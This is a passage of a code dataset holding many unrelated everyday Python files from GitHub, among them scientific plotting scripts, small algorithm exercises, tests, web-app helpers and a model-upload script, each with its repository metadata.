tqdm(user_list):\r\n cosine_list = []\r\n spec_tag_lis = user_tag_df['hashtag'].loc[user_tag_df['user_id'] == user].tolist()[0]\r\n print(str(user)+': '+str(len(spec_tag_lis)))\r\n for tag in spec_tag_lis:\r\n if str(tag) != 'nan':\r\n # print('yes')\r\n cosine_list.append(cosine_similar(user, tag, user_arr_dict, tag_arr_dict))\r\n # tag_cos_dict = OrderedDict()\r\n tag_cos_dict = dict(zip(cosine_list, spec_tag_lis))\r\n tag_cos_dict = sorted(tag_cos_dict.items(), reverse=True)\r\n # print(tag_cos_dict)\r\n spe_user_cos_list.append(tag_cos_dict)\r\n\r\n rank_dict = dict(zip(user_list, spe_user_cos_list))\r\n return rank_dict\r\n\r\n\r\ndef embedding_rec(user, rank_dict):\r\n '''\r\n t1, t2 = rank_dict[user][0][1]\r\n if isinstance(t1, str):\r\n return [t1]\r\n else:\r\n return [t2]\r\n '''\r\n tag_lis = []\r\n for i in range(5):\r\n try:\r\n tag_lis.append(rank_dict[user][i][1])\r\n except:\r\n tag_lis.append('None')\r\n print(tag_lis)\r\n # rank_dict[user][0][1]返回tuple(cosine_sim, hashtag)中的hashtag, cosine_sim是float,hashtag是str\r\n return tag_lis\r\n # return str(rank_dict[user][0][1])\r\n\r\n\r\ndef eval_rec(user_lis):\r\n # calculate the whole rec dict of cosine_similarity of each hashtag to each user\r\n rank_dict = rank_hashtag()\r\n user_test_df = test_df.drop(['tweet_id', 'time', 'hashtag'], axis=1)\r\n\r\n success = 0\r\n for user in user_lis: # 重复出现的user要记得筛掉\r\n # print('score of tag rec for: '+user)\r\n tag_lis = embedding_rec(user, rank_dict)\r\n test_tag_lis = Preproce.get_hashtag(user_test_df[user_test_df['user_id'] == user]['content'])\r\n for tag in tag_lis:\r\n if tag in test_tag_lis:\r\n success += 1\r\n break\r\n\r\n print(\"embedding recommendation: \" + str(success / len(user_list)))\r\n\r\n\r\nif __name__ == '__main__':\r\n # eval_rec(user_list)\r\n cal_upper_bound(user_list)\r\n '''\r\n a = ['user1', 'user2', 'user3']\r\n b = ['tag1', 'tag2', 'tag3', 'tag4']\r\n c = ['3', '2', '1', '4']\r\n d1 = OrderedDict()\r\n d1 = dict(zip(b, c))\r\n print(d1)\r\n '''\r\n\r\n '''\r\n d2 = dict(zip(b, c))\r\n d3 = dict(zip(b, c))\r\n d = [d1, d1, d3]\r\n e = dict(zip(a, d))\r\n print(e)\r\n '''\r\n\r\n","repo_name":"CelestineZYJ/Per-tag-Rec","sub_path":"BertTrec.py","file_name":"BertTrec.py","file_ext":"py","file_size_in_byte":6305,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"39612069366","text":"import os\nimport csv\n\nfrom BeautifulSoup import BeautifulSoup\nimport urllib2\n\n\n\n##########################################################################\n## Module 
Constants\n##########################################################################\n\nDIRNAME = os.path.dirname(__file__)\nDATAPATH = os.path.join(DIRNAME,'wikiFilesUpdate.csv')\nOUTPATH = os.path.join(DIRNAME, 'wikiFileCurrent.csv')\n\nfield_names = [\"Language\", \"Code\", \"Wiki\", \"Base_url\"]\nwiki_url = \"http://dumps.wikimedia.org/backup-index.html\"\n\n##########################################################################\n## Modules\n##########################################################################\n\n# This function reads a CSV file and loads content into a dictionary.\ndef read_file_location(path, fieldnames):\n\twith open(path, 'rU') as data:\n\t\treader = csv.DictReader(data, fieldnames = fieldnames)\n\t\tfor row in reader:\n\t\t\tyield row\t\n\t\t\t\n# This function takes a url for an html page and returns a beautiful soup object\ndef get_soup(url):\n\thtml_page = urllib2.urlopen(url)\n\tsoup = BeautifulSoup(html_page)\n\treturn soup\t\n\t\t\t\n\n\t\n##########################################################################\n## Program takes list of wikipedia languages and obtains the url for the\n## location of the back-up files for each language and creates a CSV with this information\n##########################################################################\n\nif __name__ == \"__main__\":\n\t\n\t#Generate the list of all wiki project locations\n\tsoup = get_soup(wiki_url)\n\tlink_list = [link.get(\"href\") for link in soup.findAll(\"a\")]\n\t\n\t#Create csv file for results\n\twith open(OUTPATH, 'wb') as f:\n\t\tdict_writer = csv.DictWriter(f, field_names)\n\t\n\t\t#Add the most current wiki project location for each language\n\t\tfor idx, row in enumerate(read_file_location(DATAPATH, field_names)): \n\t\t\tfor link in link_list:\t\t\t\t\n\t\t\t\tif \"/\" + row['Wiki'] + \"/\" in \"/\" + link:\n\t\t\t\t\trow['Base_url']=link\n\t\t\t\t\tdict_writer.writerow(row)\n\t\t\t\t\tidx = idx + 1\n\t\t\t\n\t\t\t\t\n\t\t\n\t\t\t\n\t\n\t\t\t\n\t\t\t\n\n","repo_name":"Pythonsgo/DP-Tutorial","sub_path":"WikiSheetCSV.py","file_name":"WikiSheetCSV.py","file_ext":"py","file_size_in_byte":2014,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"38811291331","text":"import pathlib\n\nimport common\nimport polytwisters\n\n\ndef main():\n out_directory = pathlib.Path(\"./out/meshes\")\n out_directory.mkdir(exist_ok=True)\n w = 0.15\n for i, polytwister in len(polytwisters.ALL_HARD_POLYTWISTERS):\n name = polytwister[\"names\"][0].replace(\" \", \"_\")\n print(f'Exporting polytwister \"{name}\" ({i + 1}/{len(polytwisters.ALL_HARD_POLYTWISTERS)})...')\n args = [\n name,\n str(w),\n \"--normalize\",\n \"--mesh-out\",\n str(out_directory / f\"{name}_{w:.5}.stl\"),\n ]\n common.run_blender_script([], args)\n print(f'Polytwister \"{name}\" exported ({i + 1}/{len(polytwisters.ALL_HARD_POLYTWISTERS)})')\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"nhthn/polytwisters","sub_path":"export_meshes.py","file_name":"export_meshes.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"70210502841","text":"import pytest\n\nfrom pyvmc.core import periodic_bc\nfrom pyvmc.core.orbitals import Bands\nfrom pyvmc.core.lattice import Lattice\nfrom pyvmc.core.subsystem import SimpleSubsystem\nfrom pyvmc.core.wavefunction import FreeFermionWavefunction\nfrom pyvmc.core.walk import WalkPlan\nfrom pyvmc.core.measurement import 
BasicMeasurementPlan\nfrom pyvmc.library.renyi import RenyiModPossibleWalkPlan, RenyiSignWalkPlan, RenyiModPossibleMeasurementPlan, RenyiSignMeasurementPlan\n\ndef test_walk_plan_json():\n lattice = Lattice([24, 2])\n wf = FreeFermionWavefunction(lattice=lattice, orbitals=[Bands([9, 3], [periodic_bc, periodic_bc])])\n subsystem = SimpleSubsystem([8, 2], lattice)\n\n renyi_modpossible_plan = RenyiModPossibleWalkPlan(wf, subsystem)\n assert WalkPlan.from_json(renyi_modpossible_plan.to_json(), wf) == renyi_modpossible_plan\n assert RenyiModPossibleWalkPlan.from_json(renyi_modpossible_plan.to_json(), wf) == renyi_modpossible_plan\n\n renyi_sign_plan = RenyiSignWalkPlan(wf, subsystem)\n assert WalkPlan.from_json(renyi_sign_plan.to_json(), wf) == renyi_sign_plan\n assert RenyiSignWalkPlan.from_json(renyi_sign_plan.to_json(), wf) == renyi_sign_plan\n\n with pytest.raises(Exception):\n RenyiSignWalkPlan.from_json(renyi_modpossible_plan.to_json(), wf)\n\ndef test_measurement_plan_json():\n lattice = Lattice([24, 2])\n wf = FreeFermionWavefunction(lattice=lattice, orbitals=[Bands([9, 3], [periodic_bc, periodic_bc])])\n subsystem = SimpleSubsystem([8, 2], lattice)\n\n renyi_modpossible_plan = RenyiModPossibleMeasurementPlan(wf, subsystem)\n assert BasicMeasurementPlan.from_json(renyi_modpossible_plan.to_json(), wf) == renyi_modpossible_plan\n assert RenyiModPossibleMeasurementPlan.from_json(renyi_modpossible_plan.to_json(), wf) == renyi_modpossible_plan\n\n renyi_sign_plan = RenyiSignMeasurementPlan(wf, subsystem)\n assert BasicMeasurementPlan.from_json(renyi_sign_plan.to_json(), wf) == renyi_sign_plan\n assert RenyiSignMeasurementPlan.from_json(renyi_sign_plan.to_json(), wf) == renyi_sign_plan\n\n with pytest.raises(Exception):\n RenyiSignMeasurementPlan.from_json(renyi_modpossible_plan.to_json(), wf)\n","repo_name":"garrison/vmc","sub_path":"pyvmc/tests/library/test_renyi.py","file_name":"test_renyi.py","file_ext":"py","file_size_in_byte":2172,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"36068857850","text":"from odoo import models\n\n\nclass SaleOrder(models.Model):\n _inherit = 'sale.order'\n\n def action_invoice_create(self, grouped=False, final=False):\n invoice_ids = super().action_invoice_create(\n grouped=grouped, final=final)\n invoices = self.env['account.invoice'].browse(invoice_ids)\n for invoice in invoices:\n for line in invoice.invoice_line_ids:\n if line.quantity == 0:\n line.unlink()\n pickings = invoice.mapped(\n 'invoice_line_ids.move_line_ids.picking_id')\n invoice.picking_ids = [(6, 0, pickings.ids)]\n if sum(invoice.mapped('invoice_line_ids.quantity')) == 0:\n invoice.unlink()\n return invoice_ids\n","repo_name":"treytux/trey-addons","sub_path":"sale_invoice_picking_date_limit/models/sale_order.py","file_name":"sale_order.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"40"} +{"seq_id":"19663101928","text":"#Consider the searching problem\n#Input: List of integers, and value v\n#Output: An index i such that v = A[i] or -1 if v does not appear\n#Code for linear search\n\ndef linear_search(A, v):\n for i in range(len(A)):\n if A[i] == v:\n return i\n return -1\n\nif __name__ == \"__main__\":\n A = [1,2,3]\n print(\"A is \", A)\n print(\"The index of 4 in A is \", linear_search(A, 4))\n print(\"The index of 2 in A is \", 
linear_search(A,2))","repo_name":"zmatteson/clrs-algorithm","sub_path":"chapter_2/exercices/2_1_3.py","file_name":"2_1_3.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"1434411075","text":"# -*- coding: utf-8 -*-\n\nimport argparse\n\nfrom logging import getLogger\n\nimport util\n\nlogger = getLogger(__name__)\n\n\ndef download(conf, args):\n \"\"\"\n\n :param CoreConf conf:\n :param args:\n :return:\n \"\"\"\n repositories = [x.baseurl for x in conf.repository_list if x.baseurl]\n for art in args.artifacts:\n v = art.split(':')\n util.download_package(repositories, v[0], v[1], \".\", v[2])\n return (True, None)\n\n\ndef setup_subcmd(subparsers):\n get_parser = subparsers.add_parser('download', help=\"Get single artifact\")\n get_parser.add_argument('artifacts', nargs='+')\n get_parser.set_defaults(handler=download)\n","repo_name":"nishemon/marun","sub_path":"marun/sub_get.py","file_name":"sub_get.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"6825332476","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Mar 16 16:27:03 2019\n\n@author: Aryan Singh\n\"\"\"\n\n'''\n\n To begin, let’s consider the children’s game Hot Potato. \n In this game (see Figure 2) children line up in a circle \n and pass an item from neighbor to neighbor as fast as \n they can. At a certain point in the game, the action \n is stopped and the child who has the item (the potato) \n is removed from the circle. Play continues until only \n one child is left.\n\n'''\n\n# importing the python queue\nimport queue\n\ndef hot_potato(nameList, num):\n \n q = queue.Queue(maxsize=20) \n for name in nameList:\n q.put(name)\n \n while q.qsize()>1:\n for i in range(num):\n q.put(q.get())\n \n q.get()\n \n return q.get()\n\nprint(hot_potato([\"Bill\",\"David\",\"Susan\",\"Jane\",\"Kent\",\"Brad\"],7)) ","repo_name":"aryan-eth/All-About-Python","sub_path":"basics/hotPotato.py","file_name":"hotPotato.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"40"} +{"seq_id":"33967338477","text":"# coding=utf-8\n\n# 查找具体的文件夹,文件名或者文件包含特定字符.\n# 如果要查找文件,那个文件夹中不能包含特定字符\n# 如果要查找文件夹,那个文件中不能包含特定字符\n# 如果要查找的文件夹和文件包含一样的特殊字符,可以使用\n\nimport os\n\ndirs = [\n 'z:\\\\AFR',\n 'z:\\\\ANZ',\n 'z:\\\\ASP',\n 'z:\\\\Deadwood',\n 'z:\\\\DOW30',\n 'z:\\\\EUR',\n 'z:\\\\FTSE100',\n 'z:\\\\IPM',\n 'z:\\\\LTA',\n 'z:\\\\NRA',\n 'z:\\\\UKI',\n]\n\n# dirs = [\n# 'D:\\QA\\GEDF\\GEDataFeed-master\\GEDF\\MOCAL4169',\n# 'D:\\QA\\GEDF\\GEDataFeed-master\\GEDF\\MOCAL4892'\n# ]\n\nspecify_daily = 'Daily'\nspecify_monthly = 'Monthly'\nspecify_delta = 'Delta'\n\n\ndef process(dir):\n print(\"开始运行 %s\" % dir)\n results = []\n folders = [dir]\n for folder in folders:\n # 把目录下所有文件夹存入待遍历的folders\n folders += [os.path.join(folder, x) for x in os.listdir(folder)\n if os.path.isdir(os.path.join(folder, x))]\n\n results += [os.path.relpath(folder, start=dir) # os.path.relpath(os.path.join(folder, x) 这种方式获取��件的路径\n for x in os.listdir(folder)\n if os.path.isfile(os.path.join(folder, x))\n and (specify_daily in x or specify_monthly in x or specify_delta in x)]\n return results\n\n\ndef persistent_data(results):\n print(\"开始输出\")\n set_r = set(results)\n with open('resource/special_path.dat', 'a+') as f:\n for result in set_r:\n f.write(result+\"\\n\")\n for result in set_r:\n 
print(result)\n    print('Found %s results!' % len(set_r))\n\n\nfor d in dirs:\n    rs = process(d)\n    persistent_data(rs)","repo_name":"atomicbombvendor/LearnPythonHardWay3","sub_path":"test/FindSpecialPath.py","file_name":"FindSpecialPath.py","file_ext":"py","file_size_in_byte":1721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} {"seq_id":"12916939853","text":"class Solution(object):\n    def isValid(self, s):\n        \"\"\"\n        :type s: str\n        :rtype: bool\n        \"\"\"\n        mapping = {\n            ')': '(',\n            '}': '{',\n            ']': '[',\n        }\n        n = len(s)\n        stack = list()\n        for i in range(n):\n            v = s[i]\n            if v in mapping.keys() and stack and mapping[v] == stack[-1]:\n                stack.pop()\n            else:\n                stack.append(v)\n        return True if not stack else False\n","repo_name":"albertmenglongli/Algorithms","sub_path":"LeetCode/lc_020_ValidParentheses.py","file_name":"lc_020_ValidParentheses.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} {"seq_id":"19003661874","text":"## This script reads in 2D histogram data in csv format,\n## i.e. number of samples per bin, where the number of bins is given by number of rows\n## times number of cols. The rows give bins in range (-xrange, xrange)+bias_x, \n## the cols bins in range (-yrange, yrange)+bias_y. xrange, yrange and the biases, \n## as well as the temperature, need to be specified below.\n## Read in data, normalize histogram, print histogram and true density, and print\n## distributional error vs h (if activated).\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.ticker as ticker\nfrom matplotlib.ticker import LogLocator\nimport csv\nfrom cycler import cycler\n# from integrators_tests import dist_diff\nfrom GM_functions import posterior_plot\nfrom GM_functions import gaussmix\nfrom matplotlib import cm\n\n# plt.close('all')\n# plt.rcParams.update({'font.size': 33})\n# plt.rc('legend', fontsize=33)    # legend fontsize\n# plt.rcParams['axes.grid'] = True\n# plt.rc('lines', linewidth=3)\n# plt.rcParams['axes.titlepad'] = 25\n\n#%%\n \nx_range = 1    # configuration interval (-x_range, x_range) where densities are notably > 0\nbias_x = 5\ny_range = 1\nbias_y = 0\n\nT=1\nh=\"0.025\"\nL=1\n# rho = config_density_HO\n\nplotrange = (-0.07,0.07)\nname = \"/home/rene/PhD/Research/code/Integrators/GM/histo_OBABO_\"  # file name head to read\ntitle = r\" Harmonic Oscillator Sampling with OBABO\"\n\nfiles = [\"h0.050\"]\nlabels = [r\"$h$=0.05\"]\n\n\n# colors = [\"b\", \"orange\", \"g\", \"c\"]\ncolors = [\"c\"]\n\ndist_mse = []\nfig, ax = plt.subplots()\n\nfor (file, label, c) in zip(files,labels, colors):\n    print(name+file)\n    with open(name+file) as csv_file:\n\n        csv_reader = csv.reader(csv_file, delimiter=' ')\n        # rowct = 0\n        # for row in csv_reader:    # count rows\n        #     rowct += 1\n        # bin_ctrs = np.zeros((rowct,rowct))\n        bin_ctrs = []\n        for row in csv_reader:\n            bin_ctrs += [[int(i) for i in row[0:-1]]]\n    \n    nr_bins = len(bin_ctrs) - 2\n    bin_ctrs = np.array(bin_ctrs)\n    # dist_mse += [dist_diff(bin_ctrs, nr_bins, (-1*x_range, x_range), rho, (T))] \n\n    # plot histograms\n    delta_x = 2*x_range / nr_bins   # width of bins\n    delta_y = 2*y_range / nr_bins\n    histo = bin_ctrs / (np.sum(bin_ctrs)*delta_x*delta_y)   # normalize\n    # midx = np.arange(-x_range+bias_x + 0.5*delta_x, x_range+bias_x, delta_x)  # center of bins in x\n    # midy = np.arange(-y_range+bias_y + 0.5*delta_y, y_range+bias_y, delta_y)  # center of bins in y \n    # ax.plot(midx, histo[1:-1], c, label=label )\n    
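The `plot_histo.py` record above turns raw 2D bin counts into a density estimate by dividing by the total count times the bin area. A minimal, self-contained sketch of that normalization step — the grid shape and ranges here are illustrative stand-ins, not values from the original data files:

```python
import numpy as np

# Illustrative bin counts (rows = x bins, cols = y bins); the real script reads them from CSV.
bin_counts = np.random.randint(1, 100, size=(20, 20)).astype(float)

x_range, y_range = 1.0, 1.0          # half-widths of the sampled region
nr_bins = bin_counts.shape[0]
delta_x = 2 * x_range / nr_bins      # bin width along x
delta_y = 2 * y_range / nr_bins      # bin width along y

# Normalize so the histogram integrates to 1 over the 2D region.
density = bin_counts / (bin_counts.sum() * delta_x * delta_y)

# Sanity check: summing density times the bin area recovers ~1.
assert abs(density.sum() * delta_x * delta_y - 1.0) < 1e-9
```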
plt.imshow(histo[1:-1,1:-1], cmap=cm.jet, extent=(bias_x-x_range,bias_x+x_range,\n bias_y+y_range,bias_y-y_range))\n plt.colorbar()\n\n\n# plot density and finalize plot \n# rho = rho(midx, T)\n# # rho = rho(midx, T)\n# ax.plot(midx, rho, linestyle= \"dashdot\", c=\"k\", alpha=0.7, label=r\"$\\rho_{{\\beta}}$\")\n# ax.set_xlabel(r\"$\\theta$\")\n# ax.set_ylabel(r\"Occurence Frequency\")\n# ax.set_xlim(plotrange)\n# fig.suptitle(title, y=0.95)\n# ax.legend()\n#%%\n# plot distribution error\n# fig2, ax2 = plt.subplots()\n# # h_axis = [float(h) for h in hs]\n# N_axis = [float(N[2:]) for N in Ns]\n# c=\"r\"\n# ax2.scatter(np.log10(N_axis), np.log10(dist_mse), s=80, label=\"OBABO\", c=c)\n# ax2.plot(np.log10(N_axis), np.log10(dist_mse), c=c)\n# # ax2.scatter(N_axis, np.log(dist_mse), s=80, label=\"distributional mse\")\n# ax2.set_ylabel(r\"log$_{{10}}$(mse)\")\n# ax2.set_xlabel(r\"log$_{{10}}$(N)\")\n# fig2.suptitle(r\"Method Convergence on HO, Additive Noise $\\sigma$=0.1, $h$=0.05\") \n# fig2.legend()\n \n\nplt.show()","repo_name":"SchroedingersLion/GaussianMixtureSampling","sub_path":"plot_histo.py","file_name":"plot_histo.py","file_ext":"py","file_size_in_byte":3541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"4816330188","text":"import os\n\nimport numpy as np\nfrom datasets import Dataset\nfrom huggingface_hub import push_to_hub_keras\nfrom huggingface_hub import upload_file\nfrom doe2vec import doe_model\nimport tensorflow as tf\n\nmodel_type = \"VAE\"\nkl_weight = 0.001\nn = 250000\nseed = 0\ndir = \"../models\"\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\"\nos.environ['TF_FORCE_GPU_ALLOW_GROWTH'] = 'true'\ntf.config.experimental.enable_tensor_float_32_execution(False)\nfor d in [2]:\n #push data\n functions = np.load(\n f\"{dir}/functions_d{d}-n{n}.npy\"\n )\n datadict = {\n \"function\": functions,\n }\n dataset = Dataset.from_dict(datadict)\n dataset.push_to_hub(\n f\"{n}-randomfunctions-{d}d\"\n )\n for m in [8]:\n for latent_dim in [24]:\n obj = doe_model(\n d,\n m,\n n=250000,\n latent_dim=latent_dim,\n kl_weight=kl_weight,\n use_mlflow=False,\n )\n if not obj.loadModel(\"../models/\"):\n obj.generateData()\n obj.compile()\n obj.fit(100)\n obj.save(\"../models/\")\n push_to_hub_keras(\n obj.autoencoder,\n f\"doe2vec-d{d}-m{m}-ls{latent_dim}-{model_type}-kl{kl_weight}\",\n )\n \n readme = f\"\"\"---\nlanguage:\n- en\nlicense: apache-2.0\nlibrary_name: keras\ntags:\n- doe2vec\n- exploratory-landscape-analysis\n- autoencoders\ndatasets:\n- BasStein/{n}-randomfunctions-{d}d\nmetrics:\n- mse\nco2_eq_emissions:\n emissions: 0.0363\n source: \"code carbon\"\n training_type: \"pre-training\"\n geographical_location: \"Leiden, The Netherlands\"\n hardware_used: \"1 Tesla T4\"\n---\n\n## Model description\n\nDoE2Vec model that can transform any design of experiments (function landscape) to a feature vector. \nFor different input dimensions or sample size you require a different model. 
\nEach model name is built up like doe2vec-d{{dimension}}-m{{sample size}}-ls{{latent size}}-{{AE or VAE}}-kl{{KL loss weight}}\n\nExample code for loading this huggingface model using the doe2vec package.\n\nFirst install the package\n\n```zsh\npip install doe2vec\n```\n\nThen import and load the model.\n\n```python\nfrom doe2vec import doe_model\n\nobj = doe_model(\n    {d},\n    {m},\n    latent_dim={latent_dim},\n    kl_weight={kl_weight},\n    model_type=\"{model_type}\"\n)\nobj.load_from_huggingface()\n#test the model\nobj.plot_label_clusters_bbob()\n```\n\n## Intended uses & limitations\n\nThe model is intended to be used to generate feature representations for optimization function landscapes.\nThe representations can then be used for downstream tasks such as automatic optimization pipelines and meta-learning.\n\n\n## Training procedure\n\nThe model is trained using a weighted KL loss and mean squared error reconstruction loss.\nThe model is trained using 250.000 randomly generated functions (see the dataset) over 100 epochs.\n\n- **Hardware:** 1x Tesla T4 GPU\n- **Optimizer:** Adam\n\n\"\"\"\n        text_file = open(\"README.md\", \"wt\")\n        text_file.write(readme)  # don't rebind n here: it still holds the sample count used in the file/dataset names\n        text_file.close()\n        upload_file(\n            path_or_fileobj=\"README.md\", \n            path_in_repo=\"README.md\", \n            repo_id= f\"BasStein/doe2vec-d{d}-m{m}-ls{latent_dim}-{model_type}-kl{kl_weight}\"\n        )\n","repo_name":"Basvanstein/doe2vec","sub_path":"experiments/push_to_huggingface.py","file_name":"push_to_huggingface.py","file_ext":"py","file_size_in_byte":3314,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} {"seq_id":"36151187927","text":"\"\"\"k-Nearest Neighbors (kNN) model for finding the k nearest neighbors for a given query set in a target set.\"\"\"\n\n\nimport numpy as np\nfrom sklearn.neighbors import NearestNeighbors\n\n\ndef knn(\n    query_vec: np.ndarray, target_vec: np.ndarray, k: int, distance_metric: str = \"euclidean\"\n) -> tuple[np.ndarray, np.ndarray]:\n    \"\"\"Find the k nearest neighbors of a query vector within a target vector.\n\n    Args:\n        query_vec (np.ndarray): The query vector.\n        target_vec (np.ndarray): The target vector.\n        k (int): The number of nearest neighbors to find.\n        distance_metric (str, optional): The distance metric to use.\n            Defaults to \"euclidean\".\n\n    Returns:\n        tuple[np.ndarray, np.ndarray]: The indices and distances of the k nearest neighbors.\n    \"\"\"\n    # Create a NearestNeighbors object and fit the target vector\n    nbrs = NearestNeighbors(n_neighbors=k, algorithm=\"brute\", metric=distance_metric).fit(\n        target_vec\n    )\n    # Find the k nearest neighbors of the query vector\n    distances, indices = nbrs.kneighbors(query_vec)\n    return indices, distances\n","repo_name":"SebastiaanJohn/knn-nbr-analysis","sub_path":"src/models/knn.py","file_name":"knn.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} {"seq_id":"3373567514","text":"import configparser\nimport os,sys\npwd=os.getcwd()\nbase_path=os.path.abspath(os.path.dirname(os.path.dirname(__file__)))\n\n\nclass GitIni:\n\n    def get_ini(self):\n        \"Read all of the data in the configuration file\"\n        file_path = base_path+'/Config/server.ini'\n        cf = configparser.ConfigParser()\n        cf.read(file_path,encoding=\"utf-8-sig\")\n        return cf\n\n    def get_value(self,key,node=None):\n        if node==None:\n            node = 'server'\n        cf = self.get_ini()\n        try:\n            data = cf.get(node,key)\n        except Exception as e:\n            print(\"No value was found\")\n            data = None\n        return data\nconfig_data = GitIni()\n\nif 
__name__ == \"__main__\":\n\n    print(GitIni().get_value(\"host\"))","repo_name":"319jin/interface","sub_path":"Base/read_ini.py","file_name":"read_ini.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} {"seq_id":"39095161650","text":"import numpy as np\nfrom scipy.interpolate import interp1d\nimport argparse\n\ndef main():\n    parser = argparse.ArgumentParser(\"Dummy forward model\")\n    parser.add_argument(\"finput\", type=str,\n                        help=\"The input file name\")\n    parser.add_argument(\"-n\", type=int, default=1000,\n                        help=\"The number of output values (default: 1000)\")\n    parser.add_argument(\"-o\", type=str, default=\"output.txt\",\n                        help=\"The output file name (default: 'output.txt')\")\n    parser.add_argument(\"-t\", type=str, default=\"cubic\",\n                        help=\"Interpolation type (default: 'cubic')\")\n    args = parser.parse_args()\n\n    # normalize the input arguments\n    args.t = args.t.lower().strip()\n    args.o = args.o.strip()\n\n    # check if args.t is among the options\n    interp_types = [\"cubic\", \"quadratic\", \"linear\"]\n    if args.t not in interp_types:\n        raise RuntimeError(\"Argument -t must be one of %s\" % str(interp_types))\n\n    # execute the main program\n    execprog(args)\n\ndef execprog(args):\n    finput = args.finput\n    nout = args.n\n    foutput = args.o\n    interp_kind = args.t.lower().strip()\n\n    # read the input\n    yinp = np.loadtxt(finput).ravel()\n    ninp = len(yinp)\n    xinp = np.linspace(0.0, 1.0, ninp)\n\n    # interpolate\n    xout = np.linspace(0.0, 1.0, nout)\n    finterp = interp1d(xinp, yinp, kind=interp_kind)\n    yout = finterp(xout)\n\n    # write the output to the output file\n    np.savetxt(foutput, yout)\n","repo_name":"mfkasim1/dummy-forward-model","sub_path":"dummyfm/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} {"seq_id":"1381098119","text":"import csv # used for saving the data to a file\nimport pandas as pd # used for data output\ndatas = open(\"/Users/zhouzilei/Desktop/data.txt\", \"r\", encoding=\"utf-8\")\nlines = datas.readlines()\nlist=[]\nfor line in lines:\n    line = line.replace(' ', '') # strip the spaces first\n    if line.split(':')[0] == \"group\":\n        group = line.split(':')[1].replace('\\n', '').replace(' ', '') # extract the group\n        list.append(group)\nall=set(list)\ncolumn = ['group']\ntest = pd.DataFrame(columns=column,data=all) # put the data into a table\ntest.to_csv('category.csv') # save the data to csv; storage location and file name\n","repo_name":"Zzl3/Cloud_Computing","sub_path":"python脚本/category.py","file_name":"category.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} {"seq_id":"21956961764","text":"import sys\r\nfrom queue import Queue\r\n\r\nn, k = map(int, sys.stdin.readline().split())\r\n\r\nQ = Queue()\r\n\r\nfor i in range(1, n + 1):\r\n    Q.put(i)\r\n\r\nk_list = []\r\nwhile Q.qsize() != 0:\r\n    for _ in range(k - 1):\r\n        Q.put(Q.get())\r\n    k_list.append(Q.get())\r\n\r\nprint(\"<\", end=\"\")\r\nfor i in k_list[: n - 1]:\r\n    print(i, end=\", \")\r\nprint(k_list[n - 1], end=\"\")\r\nprint(\">\")\r\n","repo_name":"kyu3638/baekjoon_kyu3638","sub_path":"백준/Silver/11866. 
요세푸스 문제 0/요세푸스 문제 0.py","file_name":"요세푸스 문제 0.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"4393607514","text":"from ..crud import get_db_url_by_key, create_db_url\nfrom ..schemas import URLBase\nfrom sqlalchemy.orm import Session\nfrom .db_fixtures import session\n\n\ndef test_create_db_url(session: Session):\n url_base = URLBase(target_url=\"https://example.com\")\n db_url = create_db_url(session, url_base)\n assert db_url.id_ is not None\n assert db_url.clicks == 0\n assert db_url.is_active == True\n assert db_url.key is not None\n\n\ndef test_get_url_by_key(session: Session):\n item = get_db_url_by_key(session, \"EYJEA\")\n assert item.key == \"EYJEA\"\n","repo_name":"Yaeger42/traxionch","sub_path":"shortener_app/tests/test_crud.py","file_name":"test_crud.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"10787640605","text":"# Time: O(nlogn)\n# Space: O(n)\n\nimport heapq\n\n\n# prefix sum, greedy, heap\nclass Solution(object):\n def makePrefSumNonNegative(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n result = prefix = 0\n min_heap = []\n for x in nums:\n heapq.heappush(min_heap, x)\n prefix += x\n if prefix < 0:\n prefix -= heapq.heappop(min_heap)\n result += 1\n return result\n","repo_name":"kamyu104/LeetCode-Solutions","sub_path":"Python/make-the-prefix-sum-non-negative.py","file_name":"make-the-prefix-sum-non-negative.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","stars":4314,"dataset":"github-code","pt":"40"} +{"seq_id":"14359105250","text":"from fastapi import APIRouter\nfrom fastapi import Depends\nfrom fastapi_jwt_auth import AuthJWT\n\nfrom app.data.repository import Repository\n\nrouter = 